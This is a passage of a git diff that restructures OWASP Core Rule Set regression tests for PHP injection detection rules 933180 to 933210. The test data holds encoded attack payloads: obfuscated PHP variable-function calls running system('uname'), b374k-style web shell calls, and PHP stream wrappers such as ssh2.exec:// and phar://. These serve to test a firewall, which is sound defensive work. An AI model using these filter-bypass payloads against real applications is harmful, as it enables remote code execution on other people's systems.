text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24b374k%3D%40%24s_func%2822%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 24 desc: $function\r\n (23) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24function%0D%0A%20%2823%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: 'foo=%24function%0D%0A%20%2823%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 25 desc: $__[_](24) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24__%5B_%5D%2824%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24__%5B_%5D%2824%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 26 desc: $____[_]{_}[@_](25) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 27 desc: multiline with comments stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 28 desc: $$$z(29) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%24%24z%2829%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%24%24z%2829%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 29 desc: ${_.__}(30); stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B_.__%7D%2830%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B_.__%7D%2830%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 30 desc: $ {@_.__}(31); stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 31 desc: $_[@-_]($_[@!+_] ) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 32 desc: $f(101).$f(120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24f%28101%29.%24f%28120%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24f%28101%29.%24f%28120%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 33 desc: '@$b374k("foo")' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%40%24b374k%28%22foo%22%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%40%24b374k%28%22foo%22%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 34 desc: ${$foo->bar}(200) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 35 desc: $foo->$funcname() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24foo-%3E%24funcname%28%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + data: '%24foo-%3E%24funcname%28%29' + version: "HTTP/1.1" + output: + log_contains: id "933180" + - test_id: 36 desc: Foo::$variable() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=Foo%3A%3A%24variable%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=Foo%3A%3A%24variable%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933180" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml index 32e1408fa..454d8a0d3 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml @@ -2,24 +2,21 @@ meta: author: "NiceYouKnow, azurit" description: None - enabled: true - name: 933190.yaml tests: - - test_title: 933190-1 + - test_id: 1 desc: "PHP Injection Attack: PHP Closing Tag Found" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 'file_test=&submit=1' - version: HTTP/1.1 - output: - log_contains: id "933190" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 'file_test=&submit=1' + version: HTTP/1.1 + output: + log_contains: id "933190" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml index aff09caf0..0b84ff9d4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml @@ -2,166 +2,154 @@ meta: author: "NiceYouKnow, azurit" description: None - enabled: true - name: 933200.yaml tests: - - test_title: 933200-1 + - test_id: 1 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 2 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.bzip2://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=compress.bzip2://file.bz2" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=compress.bzip2://file.bz2" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 3 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.zlib://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 4 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (zip://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=zip://archive.zip" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=zip://archive.zip" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 5 desc: "Negative test: PHP Injection Attack - Non-existent wrapper scheme (lz77://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=lz77://some_file.lz" - version: HTTP/1.1 - output: - no_log_contains: id "933200" - - test_title: 933200-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=lz77://some_file.lz" + version: HTTP/1.1 + output: + no_log_contains: id "933200" + - test_id: 6 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.shell://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 7 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.exec://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 8 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.tunnel://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 9 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.sftp://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename" + version: HTTP/1.1 + output: + log_contains: id "933200" + - test_id: 10 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.scp://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename" - version: HTTP/1.1 - output: - log_contains: id "933200" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename" + version: HTTP/1.1 + output: + log_contains: id "933200" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml index 49c79d906..46ba63c95 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml @@ -2,344 +2,322 @@ meta: author: "theMiddle, azurit" description: Test for "933210" PHP Variable Function bypass - enabled: true - name: 933210.yaml +rule_id: 933210 tests: - - test_title: 933210-1 + - test_id: 1 desc: Check for false positive 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." + version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 2 desc: Check for false positive 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" + version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 